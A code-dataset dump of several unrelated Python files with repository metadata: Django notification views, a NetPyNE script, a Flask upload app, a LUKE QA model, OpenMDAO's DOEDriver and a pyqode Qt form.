def notices(request):
"""
The main notices index view.
Template: :template:`notification/notices.html`
Context:
notices
A list of :model:`notification.Notice` objects that are not archived
and to be displayed on the site.
"""
notices = Notice.objects.notices_for(request.user, on_site=True)
return render(request, "notification/notices.html", {
"notices": notices,
    })
@login_required
def notice_settings(request):
"""
The notice settings view.
Template: :template:`notification/notice_settings.html`
Context:
notice_types
A list of all :model:`notification.NoticeType` objects.
notice_settings
A dictionary containing ``column_headers`` for each ``NOTICE_MEDIA``
and ``rows`` containing a list of dictionaries: ``notice_type``, a
:model:`notification.NoticeType` object and ``cells``, a list of
tuples whose first value is suitable for use in forms and the second
value is ``True`` or ``False`` depending on a ``request.POST``
variable called ``form_label``, whose valid value is ``on``.
"""
notice_types = NoticeType.objects.all()
settings_table = []
for notice_type in notice_types:
settings_row = []
for medium_id, medium_display in NOTICE_MEDIA:
form_label = "%s_%s" % (notice_type.label, medium_id)
setting = get_notification_setting(request.user, notice_type, medium_id)
if request.method == "POST":
if request.POST.get(form_label) == "on":
if not setting.send:
setting.send = True
setting.save()
else:
if setting.send:
setting.send = False
setting.save()
settings_row.append((form_label, setting.send))
settings_table.append({"notice_type": notice_type, "cells": settings_row})
if request.method == "POST":
next_page = request.POST.get("next_page", ".")
return HttpResponseRedirect(next_page)
notice_settings = {
"column_headers": [medium_display for medium_id, medium_display in NOTICE_MEDIA],
"rows": settings_table,
}
    return render(request, "notification/notice_settings.html", {
        "notice_types": notice_types,
        "notice_settings": notice_settings,
    })
@login_required
def single(request, id, mark_seen=True):
"""
Detail view for a single :model:`notification.Notice`.
Template: :template:`notification/single.html`
Context:
notice
The :model:`notification.Notice` being viewed
Optional arguments:
mark_seen
If ``True``, mark the notice as seen if it isn't
already. Do nothing if ``False``. Default: ``True``.
"""
notice = get_object_or_404(Notice, id=id)
if request.user == notice.recipient:
if mark_seen and notice.unseen:
notice.unseen = False
notice.save()
return render(request, "notification/single.html", {
"notice": notice,
        })
raise Http404
@login_required
def archive(request, noticeid=None, next_page=None):
"""
    Archive a :model:`notification.Notice` if the requesting user is the
recipient or if the user is a superuser. Returns a
``HttpResponseRedirect`` when complete.
Optional arguments:
noticeid
        The ID of the :model:`notification.Notice` to be archived.
next_page
The page to redirect to when done.
"""
if noticeid:
try:
notice = Notice.objects.get(id=noticeid)
if request.user == notice.recipient or request.user.is_superuser:
notice.archive()
            else:
                # only a superuser may archive other users' notices.
return HttpResponseRedirect(next_page)
except Notice.DoesNotExist:
return HttpResponseRedirect(next_page)
return HttpResponseRedirect(next_page)
@login_required
def delete(request, noticeid=None, next_page=None):
"""
    Delete a :model:`notification.Notice` if the requesting user is the recipient
or if the user is a superuser. Returns a ``HttpResponseRedirect`` when
complete.
Optional arguments:
noticeid
        The ID of the :model:`notification.Notice` to be deleted.
next_page
The page to redirect to when done.
"""
if noticeid:
try:
notice = Notice.objects.get(id=noticeid)
if request.user == notice.recipient or request.user.is_superuser:
notice.delete()
            else:
                # only a superuser may delete other users' notices.
return HttpResponseRedirect(next_page)
except Notice.DoesNotExist:
return HttpResponseRedirect(next_page)
return HttpResponseRedirect(next_page)
@login_required
def mark_all_seen(request):
"""
Mark all unseen notices for the requesting user as seen. Returns a
``HttpResponseRedirect`` when complete.
"""
Notice.objects.notices_for(request.user).update(unseen=False)
return HttpResponseRedirect(reverse("notification_notices"))
@login_required
def unseen_count(request):
    count = Notice.objects.unseen_count_for(request.user)
    return HttpResponse(count)
| 32.477833
| 89
| 0.637494
|
4a190cb92b155424e1843fc135310b7e6dfb507b
| 243
|
py
|
Python
|
examples/M1/M1_run.py
|
pabloabur/netpyne
|
7763d835eb89b9c3c1d0b49489e215ceaceafd82
|
[
"MIT"
] | 1
|
2018-01-23T00:05:57.000Z
|
2018-01-23T00:05:57.000Z
|
examples/M1/M1_run.py
|
pabloabur/netpyne
|
7763d835eb89b9c3c1d0b49489e215ceaceafd82
|
[
"MIT"
] | 2
|
2019-11-05T00:05:56.000Z
|
2019-11-18T00:16:24.000Z
|
examples/M1/M1_run.py
|
pabloabur/netpyne
|
7763d835eb89b9c3c1d0b49489e215ceaceafd82
|
[
"MIT"
] | null | null | null |
import M1 # import parameters file
from netpyne import sim # import netpyne init module
sim.createSimulateAnalyze(netParams = M1.netParams, simConfig = M1.simConfig) # create and simulate network
# check model output
sim.checkOutput('M1')
| 34.714286
| 108
| 0.786008
|
4a190ceb2abc6d3a9a389aac05e2488fd853f58a
| 1,578
|
py
|
Python
|
app/routes.py
|
joasepul/steganographic_app
|
83ae1821110971b6aa815fea465f3ddf1e717e47
|
[
"MIT"
] | null | null | null |
app/routes.py
|
joasepul/steganographic_app
|
83ae1821110971b6aa815fea465f3ddf1e717e47
|
[
"MIT"
] | null | null | null |
app/routes.py
|
joasepul/steganographic_app
|
83ae1821110971b6aa815fea465f3ddf1e717e47
|
[
"MIT"
] | null | null | null |
from app import app
import os
from flask import render_template
from flask import Flask, flash, request, redirect, send_from_directory
from werkzeug.utils import secure_filename
UPLOAD_FOLDER = './app/templates/'
ALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
# @app.route('/')
# def index():
# return render_template('index.html')
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
# check if the post request has the file part
if 'file' not in request.files:
flash('No file part')
return redirect(request.url)
file = request.files['file']
        # if the user does not select a file, the browser
        # submits an empty part without a filename
if file.filename == '':
flash('No selected file')
return redirect(request.url)
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
return render_template('uploaded_file.html',
filename=filename)
return '''
<!doctype html>
<title>Upload new File</title>
<h1>Upload new File</h1>
<form method=post enctype=multipart/form-data>
<p><input type=file name=file>
<input type=submit value=Upload>
</form>
'''
| 34.304348
| 74
| 0.624842
|
4a190d47f994819d273f7d41b14b11c48338d3bb
| 2,452
|
py
|
Python
|
examples/reading_comprehension/model.py
|
span11UR/Debias-QA
|
5214cd138ac73696a836dc0b1276e611b29e0e5a
|
[
"Apache-2.0"
] | 3
|
2021-04-13T08:12:50.000Z
|
2021-12-12T04:30:24.000Z
|
examples/reading_comprehension/model.py
|
SeanXiaoyuSun/LUKE-QA-bias-analysis
|
5214cd138ac73696a836dc0b1276e611b29e0e5a
|
[
"Apache-2.0"
] | null | null | null |
examples/reading_comprehension/model.py
|
SeanXiaoyuSun/LUKE-QA-bias-analysis
|
5214cd138ac73696a836dc0b1276e611b29e0e5a
|
[
"Apache-2.0"
] | null | null | null |
import torch.nn as nn
import torch
from torch.nn import CrossEntropyLoss
from luke.model import LukeEntityAwareAttentionModel
from examples.debias_model.config import BertConfig
from ..debias_model.model import BertModel
class LukeForReadingComprehension(LukeEntityAwareAttentionModel):
def __init__(self, args):
super(LukeForReadingComprehension, self).__init__(args.model_config)
        self.qa_outputs = nn.Linear(self.config.hidden_size + BertConfig.hidden_size, 2)
self.apply(self.init_weights)
self.debias_network = BertModel()
self.debias_network.load_state_dict(torch.load('debias_model.pt'))
def forward(
self,
word_ids,
word_segment_ids,
word_attention_mask,
entity_ids,
entity_position_ids,
entity_segment_ids,
entity_attention_mask,
start_positions=None,
end_positions=None,
):
encoder_outputs = super(LukeForReadingComprehension, self).forward(
word_ids,
word_segment_ids,
word_attention_mask,
entity_ids,
entity_position_ids,
entity_segment_ids,
entity_attention_mask,
)
        debiased_state = self.debias_network(word_ids, word_attention_mask, downstream=False)
word_hidden_states = encoder_outputs[0][:, : word_ids.size(1), :]
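        # Concatenate LUKE's word representations with the debiased BERT states
        # along the feature axis before the span-prediction head.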
        logits = self.qa_outputs(torch.cat((word_hidden_states, debiased_state), 2))
start_logits, end_logits = logits.split(1, dim=-1)
start_logits = start_logits.squeeze(-1)
end_logits = end_logits.squeeze(-1)
if start_positions is not None and end_positions is not None:
if len(start_positions.size()) > 1:
start_positions = start_positions.squeeze(-1)
if len(end_positions.size()) > 1:
end_positions = end_positions.squeeze(-1)
ignored_index = start_logits.size(1)
start_positions.clamp_(0, ignored_index)
end_positions.clamp_(0, ignored_index)
loss_fct = CrossEntropyLoss(ignore_index=ignored_index)
start_loss = loss_fct(start_logits, start_positions)
end_loss = loss_fct(end_logits, end_positions)
total_loss = (start_loss + end_loss) / 2
outputs = (total_loss,)
else:
outputs = tuple()
return outputs + (start_logits, end_logits,)
| 36.058824
| 93
| 0.65783
|
4a190ee6746dbfc8f8fbb8eeb402d5cf78f56a70
| 10,646
|
py
|
Python
|
openmdao/drivers/doe_driver.py
|
bollwyvl/OpenMDAO
|
4d7a31b2bb39674e2be0d6a13cbe22de3f5353af
|
[
"Apache-2.0"
] | null | null | null |
openmdao/drivers/doe_driver.py
|
bollwyvl/OpenMDAO
|
4d7a31b2bb39674e2be0d6a13cbe22de3f5353af
|
[
"Apache-2.0"
] | null | null | null |
openmdao/drivers/doe_driver.py
|
bollwyvl/OpenMDAO
|
4d7a31b2bb39674e2be0d6a13cbe22de3f5353af
|
[
"Apache-2.0"
] | 1
|
2018-07-27T06:39:15.000Z
|
2018-07-27T06:39:15.000Z
|
"""
Design-of-Experiments Driver.
"""
from __future__ import print_function
import traceback
import inspect
from openmdao.core.driver import Driver, RecordingDebugging
from openmdao.core.analysis_error import AnalysisError
from openmdao.drivers.doe_generators import DOEGenerator, ListGenerator
from openmdao.utils.mpi import MPI
from openmdao.recorders.sqlite_recorder import SqliteRecorder
class DOEDriver(Driver):
"""
Design-of-Experiments Driver.
Attributes
----------
_name : str
The name used to identify this driver in recorded cases.
_recorders : list
List of case recorders that have been added to this driver.
_comm : MPI.Comm or None
MPI communicator object.
_color : int or None
In MPI, the cached color is used to determine which cases to run on this proc.
"""
def __init__(self, generator=None, **kwargs):
"""
Constructor.
Parameters
----------
generator : DOEGenerator, list or None
The case generator or a list of DOE cases.
**kwargs : dict of keyword arguments
Keyword arguments that will be mapped into the Driver options.
"""
# if given a list, create a ListGenerator
if isinstance(generator, list):
generator = ListGenerator(generator)
elif generator and not isinstance(generator, DOEGenerator):
if inspect.isclass(generator):
raise TypeError("DOEDriver requires an instance of DOEGenerator, "
"but a class object was found: %s"
% generator.__name__)
else:
raise TypeError("DOEDriver requires an instance of DOEGenerator, "
"but an instance of %s was found."
% type(generator).__name__)
super(DOEDriver, self).__init__(**kwargs)
if generator is not None:
self.options['generator'] = generator
self._name = ''
self._recorders = []
self._comm = None
self._color = None
def _declare_options(self):
"""
Declare options before kwargs are processed in the init method.
"""
self.options.declare('generator', types=(DOEGenerator), default=DOEGenerator(),
desc='The case generator. If default, no cases are generated.')
self.options.declare('run_parallel', types=bool, default=False,
desc='Set to True to execute cases in parallel.')
self.options.declare('procs_per_model', types=int, default=1, lower=1,
desc='Number of processors to give each model under MPI.')
def _setup_comm(self, comm):
"""
Perform any driver-specific setup of communicators for the model.
Parameters
----------
comm : MPI.Comm or <FakeComm> or None
The communicator for the Problem.
Returns
-------
MPI.Comm or <FakeComm> or None
The communicator for the Problem model.
"""
if MPI and self.options['run_parallel']:
self._comm = comm
procs_per_model = self.options['procs_per_model']
full_size = comm.size
size = full_size // procs_per_model
if full_size != size * procs_per_model:
raise RuntimeError("The total number of processors is not evenly divisible by the "
"specified number of processors per model.\n Provide a "
"number of processors that is a multiple of %d, or "
"specify a number of processors per model that divides "
"into %d." % (procs_per_model, full_size))
color = self._color = comm.rank % size
model_comm = comm.Split(color)
else:
self._comm = None
model_comm = comm
return model_comm
def _set_name(self):
"""
Set the name of this DOE driver and its case generator.
Returns
-------
str
The name of this DOE driver and its case generator.
"""
generator = self.options['generator']
gen_type = type(generator).__name__.replace('Generator', '')
if gen_type == 'DOEGenerator':
self._name = 'DOEDriver' # Empty generator
else:
self._name = 'DOEDriver_' + gen_type
return self._name
def _get_name(self):
"""
Get the name of this DOE driver and its case generator.
Returns
-------
str
The name of this DOE driver and its case generator.
"""
return self._name
def run(self):
"""
Generate cases and run the model for each set of generated input values.
Returns
-------
boolean
            Failure flag; True if failed to converge, False if successful.
"""
self.iter_count = 0
# set driver name with current generator
self._set_name()
if self._comm:
case_gen = self._parallel_generator
else:
case_gen = self.options['generator']
for case in case_gen(self._designvars, self._problem.model):
self._run_case(case)
self.iter_count += 1
return False
def _run_case(self, case):
"""
Run case, save exception info and mark the metadata if the case fails.
Parameters
----------
case : list
list of name, value tuples for the design variables.
"""
        metadata = {}
        for dv_name, dv_val in case:
            try:
                self.set_design_var(dv_name, dv_val)
            except ValueError as err:
                # re-raise with the offending variable and value for context
                raise ValueError("Error assigning %s = %s: %s"
                                 % (dv_name, dv_val, str(err)))
with RecordingDebugging(self._get_name(), self.iter_count, self) as rec:
try:
self._problem.model.run_solve_nonlinear()
metadata['success'] = 1
metadata['msg'] = ''
except AnalysisError:
metadata['success'] = 0
metadata['msg'] = traceback.format_exc()
except Exception:
metadata['success'] = 0
metadata['msg'] = traceback.format_exc()
print(metadata['msg'])
# save reference to metadata for use in record_iteration
self._metadata = metadata
def _parallel_generator(self, design_vars, model=None):
"""
Generate case for this processor when running under MPI.
Parameters
----------
design_vars : dict
Dictionary of design variables for which to generate values.
model : Group
The model containing the design variables (used by some generators).
Yields
------
list
list of name, value tuples for the design variables.
"""
size = self._comm.size // self.options['procs_per_model']
color = self._color
generator = self.options['generator']
for i, case in enumerate(generator(design_vars, model)):
if i % size == color:
yield case
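        # Editorial note: continuing the example above (size == 4), the group
        # with color 1 yields cases 1, 5, 9, ... -- every size-th case -- so
        # the full DOE is partitioned round-robin across model communicators.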
def add_recorder(self, recorder):
"""
Add a recorder to the driver.
Parameters
----------
recorder : CaseRecorder
A recorder instance.
"""
# keep track of recorders so we can flag them as parallel
# if we end up running in parallel
self._recorders.append(recorder)
super(DOEDriver, self).add_recorder(recorder)
def _setup_recording(self):
"""
Set up case recording.
"""
if MPI:
procs_per_model = self.options['procs_per_model']
for recorder in self._recorders:
recorder._parallel = True
# if SqliteRecorder, write cases only on procs up to the number
# of parallel DOEs (i.e. on the root procs for the cases)
if isinstance(recorder, SqliteRecorder):
if procs_per_model == 1:
recorder._record_on_proc = True
else:
size = self._comm.size // procs_per_model
if self._comm.rank < size:
recorder._record_on_proc = True
else:
recorder._record_on_proc = False
super(DOEDriver, self)._setup_recording()
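        # Editorial note: in the 8-process / procs_per_model == 2 example,
        # size == 4 and ranks 0..3 each hold a distinct color, so exactly one
        # process per model communicator writes to the SQLite file.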
def record_iteration(self):
"""
Record an iteration of the current Driver.
"""
if not self._rec_mgr._recorders:
return
# Get the data to record (collective calls that get across all ranks)
opts = self.recording_options
filt = self._filtered_vars_to_record
if opts['record_desvars']:
des_vars = self.get_design_var_values(driver_scaling=False, filter=filt['des'])
else:
des_vars = {}
if opts['record_objectives']:
obj_vars = self.get_objective_values(driver_scaling=False, filter=filt['obj'])
else:
obj_vars = {}
if opts['record_constraints']:
con_vars = self.get_constraint_values(driver_scaling=False, filter=filt['con'])
else:
con_vars = {}
if opts['record_responses']:
# res_vars = self.get_response_values(filter=filt['res']) # not really working yet
res_vars = {}
else:
res_vars = {}
model = self._problem.model
names = model._outputs._names
views = model._outputs._views
sys_vars = {name: views[name] for name in names if name in filt['sys']}
out_vars = des_vars
out_vars.update(res_vars)
out_vars.update(obj_vars)
out_vars.update(con_vars)
out_vars.update(sys_vars)
if self.recording_options['record_inputs']:
names = model._inputs._names
views = model._inputs._views
in_vars = {name: views[name] for name in names if name in filt['in']}
else:
in_vars = {}
data = {
'out': out_vars,
'in': in_vars
}
self._rec_mgr.record_iteration(self, data, self._metadata)
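# --- Editorial example (not part of the original module): a minimal sketch of
# running DOEDriver over an explicit list of cases. The component and variable
# names ('p', 'comp', 'x', 'y') are illustrative; it assumes a standard
# OpenMDAO install, where this driver is exposed as openmdao.api.DOEDriver.
if __name__ == '__main__':
    import openmdao.api as om

    prob = om.Problem()
    prob.model.add_subsystem('p', om.IndepVarComp('x', 0.0), promotes=['x'])
    prob.model.add_subsystem('comp', om.ExecComp('y = x ** 2'),
                             promotes=['x', 'y'])
    prob.model.add_design_var('x', lower=0.0, upper=10.0)
    prob.model.add_objective('y')

    # Each case is a list of (name, value) tuples -- the same shape that
    # _run_case consumes; a plain list gets wrapped in a ListGenerator.
    prob.driver = om.DOEDriver([[('x', 1.0)], [('x', 2.0)], [('x', 3.0)]])

    prob.setup()
    prob.run_driver()
    prob.cleanup()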
avg_line_length: 32.358663
max_line_length: 99
alphanum_fraction: 0.558614

hexsha: 4a190f5c63f3bcbe6d90f33ace5a24b2da63fcf5
size: 3481
ext: py
lang: Python
max_stars_repo_path: pyqode/core/_forms/pnl_encoding_ui.py
max_stars_repo_name: SunChuquin/pyqode.core
max_stars_repo_head_hexsha: edf29204446e3679701e74343288cf692eb07d86
max_stars_repo_licenses: ["MIT"]
max_stars_count: 42
max_stars_repo_stars_event_min_datetime: 2018-05-02T07:07:27.000Z
max_stars_repo_stars_event_max_datetime: 2022-02-01T19:49:49.000Z
max_issues_repo_path: pyqode/core/_forms/pnl_encoding_ui.py
max_issues_repo_name: SunChuquin/pyqode.core
max_issues_repo_head_hexsha: edf29204446e3679701e74343288cf692eb07d86
max_issues_repo_licenses: ["MIT"]
max_issues_count: 65
max_issues_repo_issues_event_min_datetime: 2018-03-08T11:53:13.000Z
max_issues_repo_issues_event_max_datetime: 2018-09-17T09:00:09.000Z
max_forks_repo_path: Lib/site-packages/pyqode/core/_forms/pnl_encoding_ui.py
max_forks_repo_name: fochoao/cpython
max_forks_repo_head_hexsha: 3dc84b260e5bced65ebc2c45c40c8fa65f9b5aa9
max_forks_repo_licenses: ["bzip2-1.0.6", "0BSD"]
max_forks_count: 24
max_forks_repo_forks_event_min_datetime: 2015-01-09T14:16:41.000Z
max_forks_repo_forks_event_max_datetime: 2021-12-06T15:11:22.000Z
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/home/colin/dev/pyQode/pyqode.core/forms/pnl_encoding.ui'
#
# Created by: PyQt5 UI code generator 5.5.1
#
# WARNING! All changes made in this file will be lost!
from pyqode.qt import QtCore, QtGui, QtWidgets
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(964, 169)
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(Form)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.lblDescription = QtWidgets.QLabel(Form)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lblDescription.sizePolicy().hasHeightForWidth())
self.lblDescription.setSizePolicy(sizePolicy)
self.lblDescription.setWordWrap(True)
self.lblDescription.setObjectName("lblDescription")
self.verticalLayout.addWidget(self.lblDescription)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.label = QtWidgets.QLabel(Form)
self.label.setObjectName("label")
self.horizontalLayout.addWidget(self.label)
self.comboBoxEncodings = EncodingsComboBox(Form)
self.comboBoxEncodings.setMinimumSize(QtCore.QSize(250, 0))
self.comboBoxEncodings.setEditable(False)
self.comboBoxEncodings.setObjectName("comboBoxEncodings")
self.horizontalLayout.addWidget(self.comboBoxEncodings)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.verticalLayout.addLayout(self.horizontalLayout)
self.verticalLayout.setStretch(0, 1)
self.verticalLayout.setStretch(1, 1)
self.horizontalLayout_2.addLayout(self.verticalLayout)
self.pushButtonRetry = QtWidgets.QPushButton(Form)
self.pushButtonRetry.setObjectName("pushButtonRetry")
self.horizontalLayout_2.addWidget(self.pushButtonRetry)
self.pushButtonEdit = QtWidgets.QPushButton(Form)
self.pushButtonEdit.setObjectName("pushButtonEdit")
self.horizontalLayout_2.addWidget(self.pushButtonEdit)
self.pushButtonCancel = QtWidgets.QPushButton(Form)
self.pushButtonCancel.setObjectName("pushButtonCancel")
self.horizontalLayout_2.addWidget(self.pushButtonCancel)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(_("Form"))
self.lblDescription.setText(_("<html><head/><body><p><span style=\" font-weight:600;\">%s</span></p><p><span style=\" font-size:9pt;\">The file you opened has some invalid characters. If you continue editing this file you could corrupt this document. You can also choose another character encoding and try again.</span></p></body></html>"))
self.label.setText(_("Character Encoding:"))
self.pushButtonRetry.setText(_("Retry"))
self.pushButtonEdit.setText(_("Edit Anyway"))
self.pushButtonCancel.setText(_("Cancel"))
from pyqode.core.widgets.encodings import EncodingsComboBox
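# --- Editorial example (not part of the generated file): a minimal sketch of
# applying the generated class to a live widget. The generated module assumes
# a translation function '_' is already installed (pyqode normally sets this
# up elsewhere); the pass-through binding below is a stand-in for this sketch.
if __name__ == '__main__':
    import sys
    import builtins
    builtins._ = lambda s: s  # stand-in for the expected gettext-style hook

    app = QtWidgets.QApplication(sys.argv)
    panel = QtWidgets.QWidget()
    ui = Ui_Form()
    ui.setupUi(panel)  # builds the child widgets onto 'panel'
    panel.show()
    sys.exit(app.exec_())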
avg_line_length: 52.742424
max_line_length: 348
alphanum_fraction: 0.731399
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.